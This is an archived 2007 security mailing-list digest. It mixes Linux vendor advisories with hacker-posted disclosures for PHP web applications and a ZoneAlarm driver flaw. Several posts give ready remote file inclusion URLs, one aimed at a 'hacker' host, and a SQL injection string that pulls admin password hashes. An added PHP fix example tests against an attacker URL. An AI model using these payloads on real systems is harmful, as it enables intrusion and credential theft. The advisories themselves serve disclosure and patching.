corporate/4.0/i586/libfreeradius1-devel-1.0.4-2.4.20060mlcs4.i586.rpm
 0429cf3dda93772e358fc34a1d5cb1f8  
corporate/4.0/i586/libfreeradius1-krb5-1.0.4-2.4.20060mlcs4.i586.rpm
 216c28ffac0b1d03a493d5548556be2d  
corporate/4.0/i586/libfreeradius1-ldap-1.0.4-2.4.20060mlcs4.i586.rpm
 07ebd1dbb7d4f1a71253ebab163f1dd8  
corporate/4.0/i586/libfreeradius1-mysql-1.0.4-2.4.20060mlcs4.i586.rpm
 9b3586d1c94b6cf650723a095db846d7  
corporate/4.0/i586/libfreeradius1-postgresql-1.0.4-2.4.20060mlcs4.i586.rpm
 10b8fb70adfc1a641b2f63c041db1069  
corporate/4.0/i586/libfreeradius1-unixODBC-1.0.4-2.4.20060mlcs4.i586.rpm 
 0fb72186b61687df8dedff8d874fbb86  
corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 435d07e3a5878cb0fd27e02fbee702df  
corporate/4.0/x86_64/freeradius-1.0.4-2.4.20060mlcs4.x86_64.rpm
 f57c46977fbd86772852f21d138605de  
corporate/4.0/x86_64/lib64freeradius1-1.0.4-2.4.20060mlcs4.x86_64.rpm
 bcc4dc4cac18ed3d034483de311fe240  
corporate/4.0/x86_64/lib64freeradius1-devel-1.0.4-2.4.20060mlcs4.x86_64.rpm
 646309915542dad2b6e68ff130fead11  
corporate/4.0/x86_64/lib64freeradius1-krb5-1.0.4-2.4.20060mlcs4.x86_64.rpm
 039290c0f429ff9f5ecf1ce13b17765f  
corporate/4.0/x86_64/lib64freeradius1-ldap-1.0.4-2.4.20060mlcs4.x86_64.rpm
 0ca4c838dae5657c3f902ed2234a7286  
corporate/4.0/x86_64/lib64freeradius1-mysql-1.0.4-2.4.20060mlcs4.x86_64.rpm
 a48ad352690163f2fd90f022007bcd7a  
corporate/4.0/x86_64/lib64freeradius1-postgresql-1.0.4-2.4.20060mlcs4.x86_64.rpm
 e8aea2d0c9a45462ef30ab0113b62164  
corporate/4.0/x86_64/lib64freeradius1-unixODBC-1.0.4-2.4.20060mlcs4.x86_64.rpm 
 0fb72186b61687df8dedff8d874fbb86  
corporate/4.0/SRPMS/freeradius-1.0.4-2.4.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFGLO1nmqjQ0CJFipgRAsFaAJ9co3OlDWZ/TbgBhXObcQQisfeV7wCglV83
4mS7Fi8Nr26rU13+J4dlRxM=
=UflY
-END PGP SIGNATURE-



FLEA-2007-0012-1: madwifi

2007-04-23 Thread Foresight Linux Essential Announcement Service

Foresight Linux Essential Advisory: 2007-0012-1
Published: 2007-04-22

Rating: Moderate

Updated Versions:

madwifi=/[EMAIL PROTECTED]:devel//fl:desktop//[EMAIL 
PROTECTED]:1-devel//1/0.9.3-0.0.0.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-1

References:
https://issues.foresightlinux.org/browse/FL-263
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7177
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7178
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7179
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7180

Description:
Previous versions of the madwifi package were vulnerable to a number of 
Denial-of-Service issues, at least two of which can be exploited to cause a 
system crash (kernel oops). In addition, previous versions could be made to send 
unencrypted information before authentication finishes when using WPA, an 
information leak.


[ GLSA 200704-19 ] Blender: User-assisted remote execution of arbitrary code

2007-04-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Blender: User-assisted remote execution of arbitrary code
  Date: April 23, 2007
  Bugs: #168907
ID: 200704-19

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A vulnerability has been discovered in Blender allowing for
user-assisted arbitrary code execution.

Background
==

Blender is a 3D creation, animation and publishing program.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  media-gfx/blender   < 2.43>= 2.43

Description
===

Stefan Cornelius of Secunia Research discovered an insecure use of the
"eval()" function in kmz_ImportWithMesh.py.

Impact
==

A remote attacker could entice a user to open a specially crafted
Blender file (.kmz or .kml), resulting in the execution of arbitrary
Python code with the privileges of the user running Blender.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Blender users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=media-gfx/blender-2.43"

References
==========

  [ 1 ] CVE-2007-1253
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1253

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-19.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




Allfaclassfieds (level2.php dir) remote file inclusion

2007-04-23 Thread asdasd asdsadas
Allfaclassfieds  (level2.php dir) remote file inclusion

 --
 Bug Found By Dr.RoVeR -->Arab48 Hacker

 Contact: [EMAIL PROTECTED]
 ---

 Script: allfaclassfieds


 Download: http://scriptat.com/download.php?sid=718
 --

 Bug File: level2.php

 Bug code in line 4:
 require("$dir/admin/dp.php");

 --

 Exploit:
 http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]





EsForum <= 3.0 SQL Injection Vulnerability

2007-04-23 Thread ilkerkandemir
---
AYYILDIZ.ORG PreSents...


Script: EsForum v3.0
Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html

Contact: ilker Kandemir 

info:
*/ MEFISTO Begins. */

---
Exploit: 

forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*

---


Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann
Special Tnx: AYYILDIZ.ORG




Big Blue Guestbook HTML Injection Vulnerabilities

2007-04-23 Thread seko
Hi friends, 


Big Blue Guestbook software is prone to HTML injection attacks. This issue is 
exposed via the message form field in the guestbook entry submission form. 

Exploitation could permit remote attackers to persistently inject hostile HTML 
and script code into guestbook content. This could allow for theft of 
cookie-based authentications or other attacks, such as those which misrepresent 
guestbook content. 

vendor : http://www.ben-barnett.com/guestbook.php
download : http://www.ben-barnett.com/BigBlueGuestbook.zip

Thnx: www.starhack.org // CaRaMeL


WASC-Articles: 'The business case for security frameworks'

2007-04-23 Thread announcements
The Web Application Security Consortium is proud to present 'The business case 
for security frameworks' by Robert Auger. In this article Robert describes the 
advantages of using input validation frameworks during development to reduce 
risks such as Cross-site Scripting.


This document can be found at http://www.webappsec.org/projects/articles/ .


- articles_at_webappsec.org
http://www.webappsec.org


Are you interested in writing a 'Guest Article' for the WASC? Additional 
information on article guidelines may be found at 
http://www.webappsec.org/articles/. Inquiries can be sent to 
articles_at_webappsec.org

"Contributed articles may include industry best practices, technical 
information about current issues, innovative defense techniques, etc. NO 
VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete 
information from the experts on the front lines of the web application 
security field."

Join us on IRC: irc.freenode.net #webappsec


Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service

2007-04-23 Thread sapheal
Hey,

It appears that WS_FTP Professional 2007 is also vulnerable as it takes 
advantage of NetscapeFTPHandler as well.


bibtex mase Remote File Inclusion

2007-04-23 Thread InyeXion
~~
  bibtex mase Remote File Inclusion
~~
  Affected Software .: bibtex mase beta 2.0
  Download..: http://www.cs.kuleuven.ac.be/~raf/bibtex/downloads/bibtex_mase_beta_2.0.tgz
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~~

 Affected Files:

/unavailable.php
/Source.php
/log.php
/latex.php
/indexinfo.php
/index.php
/importinfo.php
/import.php
/examplefile.php
/clearinfo.php
/clear.php
/aboutinfo.php
/about.php

etc.

 Vulnerable Code:

include($bibtexrootrel."/layout/header.inc");
~~
Exploit:
  
http://[target]/unavailable.php?bibtexrootrel=Shell?
http://[target]/source.php?bibtexrootrel=Shell?
http://[target]/log.php?bibtexrootrel=Shell?
http://[target]/latex.php?bibtexrootrel=Shell?
http://[target]/indexinfo.php?bibtexrootrel=Shell?
http://[target]/index.php?bibtexrootrel=Shell?
http://[target]/importinfo.php?bibtexrootrel=Shell?
http://[target]/import.php?bibtexrootrel=Shell?
http://[target]/examplefile.php?bibtexrootrel=Shell?
http://[target]/clearinfo.php?bibtexrootrel=Shell?
http://[target]/clear.php?bibtexrootrel=Shell?
http://[target]/aboutinfo.php?bibtexrootrel=Shell?
http://[target]/about.php?bibtexrootrel=Shell?
~~~

Fixed bug:

if ((isset($_REQUEST['bibtexrootrel']) || isset($_GET['bibtexrootrel']) ||
     isset($_POST['bibtexrootrel'])) && !defined("bibtexrootrel")) {
    die("denied access");
}

~~


Remote file inclusion in Joomla 1.5.0 Beta

2007-04-23 Thread Omid
Hi,
Joomla! 1.5.0 is in Beta and "should NOT be used for `live` or
`production` sites."
Joomla 1.0.12 has good security, but it seems that Joomla 1.5.0 doesn't
have a good security approach. Anyway, there is a remote file inclusion
in Joomla 1.5.0 Beta:

File /libraries/pcl/pcltar.php, Line 74:
  if (!defined("PCLERROR_LIB"))
  {
    include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension);
  }

POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/?

The original advisory (in Persian) is located at :
http://www.hackers.ir/advisories/joomla.html


- Omid


FLEA-2007-0013-1: xine-lib

2007-04-23 Thread Foresight Linux Essential Announcement Service

Foresight Linux Essential Advisory: 2007-0013-1
Published: 2007-04-23

Rating: Moderate

Updated Versions:

xine-lib=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.1.6-1.1-1
group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-2

References:
https://issues.foresightlinux.org/browse/FL-266
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246

Description:
Previous versions of the xine-lib package were vulnerable to a buffer 
overflow which could be exploited to execute arbitrary code on the target 
machine. This can be exploited by a remote user only in a locally-assisted 
fashion - by enticing the user to open a specially crafted file.


[ GLSA 200704-18 ] Courier-IMAP: Remote execution of arbitrary code

2007-04-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-18
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Courier-IMAP: Remote execution of arbitrary code
  Date: April 22, 2007
  Bugs: #168196
ID: 200704-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in Courier-IMAP allowing for remote
code execution with root privileges.

Background
==========

Courier-IMAP is an IMAP server which is part of the Courier mail
system. It provides access only to maildirs.

Affected packages
=================

-------------------------------------------------------------------
 Package                    /  Vulnerable  /                Unaffected
-------------------------------------------------------------------
  1  net-mail/courier-imap       < 4.0.6-r2                   >= 4.0.6-r2

Description
===========

CJ Kucera has discovered that some Courier-IMAP scripts don't properly
handle the XMAILDIR variable, allowing for shell command injection.

Impact
======

A remote attacker could send specially crafted login credentials to a
Courier-IMAP server instance, possibly leading to remote code execution
with root privileges.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Courier-IMAP users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-mail/courier-imap-4.0.6-r2"

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-18.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




File117 Remote File Inclusion

2007-04-23 Thread InyeXion
~
 File117 Remote File Inclusion
~
  Affected Software .: File117
  Download..: http://www.sinato.com/jmuffin/upload/file117.zip
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~

 Affected File: 
   
/html/php/detail.php

 Vulnerable Code:


~
Exploit:
  
http://[target]/html/php/detail.php?relPath=[shell]? 
http://[target]/html/php/detail.php?folder=[shell]? 
~

Fixed bug:

if ((isset($_REQUEST['relPath']) || isset($_GET['relPath']) ||
     isset($_POST['relPath'])) && !defined("relPath")) {
    die("denied access");
}

AND

if ((isset($_REQUEST['folder']) || isset($_GET['folder']) ||
     isset($_POST['folder'])) && !defined("folder")) {
    die("denied access");
}

~


[ GLSA 200704-16 ] Aircrack-ng: Remote execution of arbitrary code

2007-04-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: Aircrack-ng: Remote execution of arbitrary code
  Date: April 22, 2007
  Bugs: #174340
ID: 200704-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Aircrack-ng contains a buffer overflow that could lead to the remote
execution of arbitrary code with root privileges.

Background
==========

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can
recover keys once enough data packets have been captured.

Affected packages
=================

-------------------------------------------------------------------
 Package                    /  Vulnerable  /                Unaffected
-------------------------------------------------------------------
  1  net-wireless/aircrack-ng    < 0.7-r2                       >= 0.7-r2

Description
===========

Jonathan So reported that the airodump-ng module does not correctly
check the size of 802.11 authentication packets before copying them
into a buffer.

Impact
======

A remote attacker could trigger a stack-based buffer overflow by
sending a specially crafted 802.11 authentication packet to a user
running airodump-ng with the -w (--write) option. This could lead to
the remote execution of arbitrary code with the permissions of the user
running airodump-ng, which is typically the root user.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Aircrack-ng users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-wireless/aircrack-ng-0.7-r2"

References
==========

  [ 1 ] CVE-2007-2057
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2057

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-16.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




claroline <= Multiple Remote File Include Vulnerability

2007-04-23 Thread Mohandko
# claroline <= Multiple Remote File Include Vulnerability
# D.Script: 
http://www.e-learningone.it/software_free/e-learning/claroline175.zip
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/claroline/inc/lib/rootSys=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: mY Love Dr.hacker BiG seso


lms 1.5.3 Remote File Inclusion

2007-04-23 Thread InyeXion
~~
  lms 1.5.3 Remote File Inclusion
~~
  Affected Software .: lms 1.5.3 libs
  Download..: http://www.lms.org.pl/download/1.5/
  Risk ..: high 
 
  Found by ..: InyeXion 
 
  Contact ...: InyeXion[at]gmail.com
  Web .: Www.InyeXion.com.ar
   
~~

 Affected File: 
   
/modules/rtmessageadd.php

 Vulnerable Code:

Line 27 include($_LIB_DIR.'/multipart_mime_email.php');
~~
Exploit:
  
http://[target]/modules/rtmessageadd.php?_LIB_DIR=Shell?
~~~

Fixed bug:

Update to the latest version

~~
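The uninitialised-include-prefix pattern shared by the bibtex mase, Joomla 1.5.0 Beta, File117 and lms posts above, beside one hardened replacement, as an added PHP example that is not code from any of the advisories or their vendors. BIBTEX_ROOT, the layout directory, the temporary stand-in directory and the allowlisted file names are assumptions made for this demo.

```php
<?php
// Added example, not code from any advisory above. The commented-out includes
// are the vulnerable shape from the bibtex mase / Joomla / File117 / lms posts;
// BIBTEX_ROOT, the layout directory and the file names are assumptions.
declare(strict_types=1);

// Application root derived from the file system, never from the request.
// A temporary directory with one layout file stands in for the real app.
$root = sys_get_temp_dir() . '/rfi_demo_' . getmypid();
mkdir($root . '/layout', 0700, true);
file_put_contents($root . '/layout/header.inc', "<?php echo \"header ok\\n\";\n");
define('BIBTEX_ROOT', $root);

// Vulnerable shape (kept as comments): the prefix is an uninitialised global
// that register_globals, or a direct request to the file, lets the client set.
//   include($bibtexrootrel . "/layout/header.inc");
//   include($g_pcltar_lib_dir . "/pclerror.lib." . $g_pcltar_extension);

// Hardened resolver: allowlisted names, a fixed base directory and a realpath
// containment check. URLs and ../ traversal never reach include().
function resolve_layout_file(string $name): ?string
{
    static $allowed = ['header.inc', 'footer.inc'];
    if (!in_array($name, $allowed, true)) {
        return null;                                  // not on the allowlist
    }
    $base = realpath(BIBTEX_ROOT . '/layout');
    $path = realpath($base . '/' . $name);
    if ($base === false || $path === false) {
        return null;                                  // directory or file missing
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;                                  // resolved outside $base
    }
    return $path;
}

// Generalisation of the "Fixed bug" guard in the bibtex mase post: refuse any
// request carrying a name the page treats as internal, on every channel at
// once ($_REQUEST covers GET, POST and cookies).
function request_overrides_internal(array $protected, array $request): bool
{
    foreach ($protected as $name) {
        if (array_key_exists($name, $request)) {
            return true;
        }
    }
    return false;
}

$internal = ['bibtexrootrel', 'g_pcltar_lib_dir', 'relPath', 'folder', '_LIB_DIR'];
if (request_overrides_internal($internal, $_REQUEST)) {
    http_response_code(403);
    exit('denied access');
}

// Constructed inputs: the legitimate name plus the two shapes seen in the
// exploit strings above (remote URL prefix and directory traversal).
foreach (['header.inc', 'http://attacker.example/shell.php?', '../../etc/passwd'] as $req) {
    $resolved = resolve_layout_file($req);
    printf("%-36s => %s\n", $req, $resolved === null ? 'rejected' : 'include ' . $resolved);
}
include resolve_layout_file('header.inc');            // prints "header ok"
```

Setting allow_url_include (and allow_url_fopen) to Off in php.ini makes PHP refuse the http:// prefix outright, but the resolver above is the fix that does not depend on server configuration and also stops local-file variants of the same bug.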


[ GLSA 200704-17 ] 3proxy: Buffer overflow

2007-04-23 Thread Raphael Marichez
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200704-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
 Title: 3proxy: Buffer overflow
  Date: April 22, 2007
  Bugs: #174429
ID: 200704-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

A vulnerability has been discovered in 3proxy allowing for the remote
execution of arbitrary code.

Background
==========

3proxy is a multi-protocol proxy, including HTTP/HTTPS/FTP and SOCKS
support.

Affected packages
=================

-------------------------------------------------------------------
 Package                    /  Vulnerable  /                Unaffected
-------------------------------------------------------------------
  1  net-proxy/3proxy            < 0.5.3h                       >= 0.5.3h

Description
===========

The 3proxy development team reported a buffer overflow in the logurl()
function when processing overly long requests.

Impact
======

A remote attacker could send a specially crafted transparent request to
the proxy, resulting in the execution of arbitrary code with privileges
of the user running 3proxy.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All 3proxy users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=net-proxy/3proxy-0.5.3h"

References
==========

  [ 1 ] CVE-2007-2031
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200704-17.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5




PHPMyBibli <= Multiple Remote File Include

2007-04-23 Thread Mohandko
# PHPMyBibli <= Multiple Remote File Include Vulnerability
# D.Script: http://phpmybibli.sourceforge.net/PhpMyBibli-nightbuild.tar.gz
# Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED]
# Homepage: http://www.MoHaNdKo.cOm
# Exploit:[Path]/includes/init.inc.php?base_path=Shell
# Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm
#Greetz To: mY Love Dr.hacker BiG seso


[Reversemode advisory] CheckPoint Zonelabs - ZoneAlarm SRESCAN driver local privilege escalation

2007-04-23 Thread Reversemode
  CHECK POINT ZONE LABS  PRODUCTS
 MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES

Rubén Santamarta <[EMAIL PROTECTED]>

04.20.2007
Affected products:
 + ZoneAlarm (Srescan.sys  v 5.0.155 and earlier )

Srescan.sys is exposed through the following DOS device: "\\.\SreScan".
Restricted accounts, including guest users, can access privileged
IOCTLs implemented within the affected driver.
In addition to this potential risk factor, the driver does not validate
user-mode buffers in Type3, thus leading to local privilege escalation
due to arbitrary kernel memory overwrite.

DosDevice: \\.\Srescan
Driver: srescan.sys    Version: 5.0.83.0

- IOCTL 0x2220CF
.text:00013127 mov     ecx, [ebp+arg_10]
.text:0001312A cmp     dword ptr [ecx], 4  ;
.text:0001312D jnz     short loc_1313F
.text:0001312F mov     edx, [ebp+FileInformation]
.text:00013132 mov     dword ptr [edx], 3h ; edx controlled
.text:00013138 xor     esi, esi
.text:0001313A mov     [ebp+var_1C], esi
.text:0001313D jmp     short loc_1315F

- IOCTL 0x22208F
.text:00014091 mov     ebp, ds:ExAllocatePoolWithTag
.text:00014097 mov     esi, 2h
.text:0001409C push    31565244h       ; Tag
.text:000140A1 push    esi             ; NumberOfBytes
.text:000140A2 push    0               ; PoolType
.text:000140A4 call    ebp             ; ExAllocatePoolWithTag
.text:000140A6 mov     ebx, eax
.text:000140A8 test    ebx, ebx
.text:000140AA jz      short loc_140F3
.text:000140AC mov     edi, ds:ZwQuerySystemInformation
.text:000140B2
.text:000140B2 loc_140B2:                      ; CODE XREF: sub_14070+81#j
.text:000140B2 lea     ecx, [esp+1Ch+ReturnLength]
.text:000140B6 push    ecx             ; ReturnLength
.text:000140B7 push    esi             ; SystemInformationLength
.text:000140B8 push    ebx             ; SystemInformation
.text:000140B9 push    5               ; SystemInformationClass
.text:000140BB call    edi             ; ZwQuerySystemInformation
.text:000140BD cmp     eax, 0C023h
.text:000140C2 mov     [esp+1Ch+var_4], eax
.text:000140C6 jz      short loc_140D6
.text:000140C8 cmp     eax, 8005h
.text:000140CD jz      short loc_140D6
.text:000140CF cmp     eax, 0C004h
.text:000140D4 jnz     short loc_14102
.text:0001411D loc_1411D:                      ; CODE XREF: sub_14070+112#j
.text:0001411D mov     eax, [edx+44h]
.text:00014120 test    eax, eax
.text:00014122 jz      short loc_1417A
[...]
.text:00014154 mov     dword ptr [eax+4], 0
.text:0001415B mov     esi, [edx+3Ch]
.text:0001415E lea     edi, [eax+0Ch]  ; edi = OutputBuffer. Controlled
.text:00014161 mov     eax, ecx
.text:00014163 shr     ecx, 2
.text:00014166 rep movsd
.text:00014168 mov     ecx, eax
.text:0001416A mov     eax, [esp+1Ch+var_8]
.text:0001416E and     ecx, 3
.text:00014171 inc     eax
.text:00014172 rep movsb
.text:00014174 mov     [esp+1Ch+var_8], eax
.text:00014178 mov     edi, eax


Exploits
No exploits are released. Ethical security companies can make contact to
request samples:
contact (at) reversemode (dot) com

References:
www.zonelabs.com
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=517
http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=48
(PDF)

---

Reversemode
Advanced Reverse Engineering Services
www.reversemode.com